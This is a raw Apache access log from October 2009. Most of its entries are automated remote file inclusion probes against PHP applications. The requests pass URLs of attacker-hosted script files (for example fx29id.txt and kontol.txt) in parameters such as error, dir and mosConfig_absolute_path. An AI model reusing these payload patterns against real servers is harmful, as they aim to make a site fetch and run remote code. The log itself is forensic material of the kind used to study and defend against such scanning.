59.24.49.35 - - [17/Oct/2009:04:47:22 -0400] "GET ///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:47:24 -0400] "GET /logs/access_log.Q109070300///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:48:32 -0400] "GET /logs/access_log.Q109060200///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.85.112.138 - - [17/Oct/2009:04:48:41 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
59.24.49.35 - - [17/Oct/2009:04:49:24 -0400] "GET /logs///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:49:24 -0400] "GET /logs/access_log.Q109070300///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:49:25 -0400] "GET ///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:49:51 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:49:51 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:49:51 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:02 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:02 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:02 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:03 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:03 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:03 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:06 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:06 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:06 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:04:50:10 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:04:50:10 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:04:50:10 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:10 -0400] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:04:50:18 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
121.124.127.164 - - [17/Oct/2009:04:50:21 -0400] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:22 -0400] "GET /logs/access_log.Q109092000%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:50:23 -0400] "GET /logs/access_log.Q109092000%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:04:50:29 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:50:38 -0400] "GET /logs/access_log.Q109060200///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
38.108.180.115 - - [17/Oct/2009:04:50:46 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.108.180.115 - - [17/Oct/2009:04:50:47 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
24.169.235.233 - - [17/Oct/2009:04:50:47 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://co103w.col103.mail.live.com/mail/InboxLight.aspx?n=768095206" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTB5.2)"
121.124.127.164 - - [17/Oct/2009:04:51:22 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:51:22 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:51:22 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:51:22 -0400] "GET /logs/access_log.Q109070500///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:51:23 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 200 453 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:51:23 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 200 22194 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:51:24 -0400] "GET /logs/access_log.Q109051600///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.814"
121.124.127.164 - - [17/Oct/2009:04:51:24 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:51:24 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:51:24 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:51:29 -0400] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:51:30 -0400] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:41 -0400] "GET /logs//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:41 -0400] "GET /logs/access_log.Q109071300//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:41 -0400] "GET //newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:41 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:42 -0400] "GET /logs//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:42 -0400] "GET //newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:42 -0400] "GET /logs/access_log.Q109071300//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:51:42 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.63.201 - - [17/Oct/2009:04:51:44 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.826"
94.23.63.201 - - [17/Oct/2009:04:51:44 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
94.23.63.201 - - [17/Oct/2009:04:51:44 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
209.59.12.99 - - [17/Oct/2009:04:51:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.63.201 - - [17/Oct/2009:04:51:51 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
94.23.63.201 - - [17/Oct/2009:04:51:55 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.826"
94.23.63.201 - - [17/Oct/2009:04:51:55 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
94.23.63.201 - - [17/Oct/2009:04:51:55 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
94.23.63.201 - - [17/Oct/2009:04:51:56 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
94.23.2.21 - - [17/Oct/2009:04:52:49 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:52:49 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:53:11 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:53:11 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:53:11 -0400] "GET /logs/access_log.Q109071300//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:53:11 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:53:30 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:53:30 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path[docroot]=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:53:45 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:53:45 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:53:45 -0400] "GET /logs/access_log.Q109071300//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:53:45 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:54:17 -0400] "GET /logs/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:54:17 -0400] "GET /errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:54:17 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:54:46 -0400] "GET ///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:54:47 -0400] "GET /logs/access_log.Q109071300///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:54:47 -0400] "GET /logs/access_log.Q109051800///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:54:47 -0400] "GET /logs///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:54:58 -0400] "GET /senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:54:58 -0400] "GET /logs/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:54:58 -0400] "GET /logs/access_log.Q109081600%20%20/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:54:58 -0400] "GET /logs/access_log.Q109071400%20%20/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:55:03 -0400] "GET /logs/access_log.Q109071300///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:55:03 -0400] "GET /logs///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:55:03 -0400] "GET ///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:55:03 -0400] "GET /logs/access_log.Q109051800///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:55:21 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:55:21 -0400] "GET /logs/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:55:21 -0400] "GET /errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:55:24 -0400] "GET /logs//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:55:24 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:55:24 -0400] "GET //include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:55:28 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.112.138 - - [17/Oct/2009:04:55:32 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://indo.home.ro/idbit??? HTTP/1.1" 404 248 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
67.192.124.144 - - [17/Oct/2009:04:55:55 -0400] "GET //include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:55:55 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:55:55 -0400] "GET /logs//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:04:56:05 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 2869991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.192.124.144 - - [17/Oct/2009:04:56:16 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:04:56:23 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
121.134.195.174 - - [17/Oct/2009:04:56:23 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
121.134.195.174 - - [17/Oct/2009:04:56:25 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
121.134.195.174 - - [17/Oct/2009:04:56:25 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
121.134.195.174 - - [17/Oct/2009:04:56:25 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
121.134.195.174 - - [17/Oct/2009:04:56:25 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
72.30.78.230 - - [17/Oct/2009:04:56:09 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 2869991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.190.49.3 - - [17/Oct/2009:04:56:28 -0400] "GET /senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:56:28 -0400] "GET /logs/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:56:28 -0400] "GET /logs/access_log.Q109071400%20%20/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:56:28 -0400] "GET /logs/access_log.Q109081600%20%20/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.134.195.174 - - [17/Oct/2009:04:56:31 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
206.225.23.4 - - [17/Oct/2009:04:56:34 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:56:34 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:56:34 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:56:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
196.41.113.26 - - [17/Oct/2009:04:57:11 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:04:57:11 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:04:57:14 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:04:57:16 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:57:37 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:57:38 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:57:48 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:57:48 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:57:49 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:04:58:19 -0400] "GET /logs/access_log.Q109081600/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:04:58:19 -0400] "GET /senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
